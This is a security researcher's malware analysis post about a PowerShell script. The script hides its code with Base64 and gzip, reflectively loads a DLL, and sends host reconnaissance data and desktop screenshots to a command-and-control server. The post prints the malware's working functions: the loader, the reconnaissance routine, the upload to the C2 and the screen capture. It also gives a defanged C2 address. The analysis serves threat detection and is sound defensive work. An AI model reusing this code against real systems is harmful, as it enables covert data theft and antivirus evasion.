Attackers are always trying to bypass antivirus detection by using new techniques to obfuscate their code. I recently found a bunch of scripts that encode part of their code in Base64. The code is decoded at execution time and processed via the 'IEX' command: iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("...Base64-data...") Another technique used by malware developers is to inject a malicious DLL into a running process. Yes, Powershell can do awesome stuff. Yesterday, I spotted a script that hides its malicious code split in the two techniques. One part of the code is Base64 encode but some functions are directly called from a DLL loaded at run time. First, the code is uncompressed and decoded, then loaded into the Powershell process: $Z4GoLn = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("..."), [IO.Compression.CompressionMode]::Decompress)
$joqOfPjY = New-Object byte[](20480) $Z4GoLn.Read($joqOfPjY, 0, 20480) | Out-Null [System.Reflection.Assembly]::Load($joqOfPjY) | Out-Null Once the DLL is loaded, it's now possible to call all functions provided by the library. This is achieved by referencing the custom type and the method ("[custom.type]::method()"): [QE7K9ZJvi46.QE7K9ZJvi46]::p9Dq() You can find all the functions in the DLL using your favourite disassembler: ************************************************************** * FUNCTION * ************************************************************** void p9Dq-57-8272() void <VOID> <RETURN> p9Dq-57-8272 0040205c 28 06 SUB byte ptr [ESI],AL 0040205e 00 00 ADD byte ptr [EAX],AL 00402060 0a 6f 07 OR CH,byte ptr [EDI + 0x7] 00402063 00 00 ADD byte ptr [EAX],AL 00402065 0a 0a OR CL,byte ptr [EDX] 00402067 28 08 SUB byte ptr [EAX],CL 00402069 00 00 ADD byte ptr [EAX],AL 0040206b 0a 6f 09 OR CH,byte ptr [EDI + 0x9] 0040206e 00 00 ADD byte ptr [EAX],AL 00402070 0a 6f 0a OR CH,byte ptr [EDI + 0xa] 00402073 00 00 ADD byte ptr [EAX],AL 00402075 0a 17 OR DL,byte ptr [EDI] 00402077 8d 0e LEA ECX,[ESI] 00402079 00 00 ADD byte ptr [EAX],AL 0040207b 01 13 ADD dword ptr [EBX],EDX 0040207d 04 11 ADD AL,0x11 0040207f 04 16 ADD AL,0x16 00402081 1f POP DS 00402082 2d 9d 11 SUB EAX,0x6f04119d 04 6f 00402087 0b 00 OR EAX,dword ptr [EAX] What does the malware do? First, it collects information about the infected host: function kvhLZVVHv40() { if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN)) { $HmHCMAj1gp = "DOMAIN: NO`n`n" } else { $HmHCMAj1gp = "DOMAIN: YES`n`n"} $HmHCMAj1gp += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n") $HmHCMAj1gp += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n") $HmHCMAj1gp += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n") $HmHCMAj1gp += "`n`nNETVIEW:`n`n" + ((net view) -join "`n") $HmHCMAj1gp += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n") $HmHCMAj1gp += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n") $HmHCMAj1gp += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n") $HmHCMAj1gp += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n") $HmHCMAj1gp += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String) $HmHCMAj1gp += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName $V6VCS = [System.Text.Encoding]::UTF8.GetBytes($HmHCMAj1gp) PMQty 0 $V6VCS } Collected data are sent to a C2: function PMQty([int]$Wg94, [byte[]]$V6VCS) { $sdo7g = "https://$F36ui/" + [QE7K9ZJvi46.QE7K9ZJvi46]::EA2gkql9ya($Wg94, 0, $true) $hwv80v = [QE7K9ZJvi46.QE7K9ZJvi46]::BPizrD($V6VCS) (New-Object System.Net.WebClient).UploadData($sdo7g, $hwv80v) } The C2 is contacted via a Base64-encoded IP address and the DLL function EA2gkql9ya() generates random URI like: hxxps://23[.]227[.]193[.]48/ddqxyg/g1/cbahpbp1y/im/g/asg/3izld2/2s5kq5xexs4h5mwc/xr51fqv2p/4zm/e.jpg Using the same technique, the malware exfiltrates the content of the following registry keys (related to different versions of Outlook):
What could be also interesting? A screen capture of the desktop! Here is the function which performs the screenshot: function cY0yMOo7U3() { Add-Type -Assembly System.Windows.Forms $Ze8Fpb5KC = [Windows.Forms.SystemInformation]::VirtualScreen $Rpmv5HB = New-Object Drawing.Bitmap $Ze8Fpb5KC.Width, $Ze8Fpb5KC.Height $ntkkayAduow = [Drawing.Graphics]::FromImage($Rpmv5HB) $ntkkayAduow.CopyFromScreen($Ze8Fpb5KC.Location, [Drawing.Point]::Empty, $Ze8Fpb5KC.Size) $ntkkayAduow.Dispose() $UkzcuaUqgj = New-Object System.IO.MemoryStream $noFMcdA6cKj=40 $hwv80voderParams = New-Object System.Drawing.Imaging.EncoderParameters $hwv80voderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $noFMcdA6cKj) $OmDwFp = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" } $Rpmv5HB.save($UkzcuaUqgj, $OmDwFp, $hwv80voderParams) $Rpmv5HB.Dispose() $V6VCS = [convert]::ToBase64String($UkzcuaUqgj.ToArray()) $V6VCS = [System.Text.Encoding]::ASCII.GetBytes($V6VCS) PMQty 2 $V6VCS } Once initial data have been exfiltrated, the malware enters a loop. It queries the C2 at random interval: Start-Sleep -s (Get-Random -Input @(200..260)) Depending on the C2 answer, the malware performs the following tasks:
Unfortunately, the C2 is down at the moment, so I can't grab the DLL/PE files. The script (SHA256:9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b) has a very low VT score (3/57)[1]. [1] https://www.virustotal.com/gui/file/9d315c1ba1d6a10c06fe0b7d12a31ec519b973403ccf01fb36584ce9750e1d6b/detection Xavier Mertens (@xme) |
Xme 579 Posts ISC Handler Sep 6th 2019 |
Thread locked Subscribe |
Sep 6th 2019 1 year ago |
Sign Up for Free or Log In to start participating in the conversation!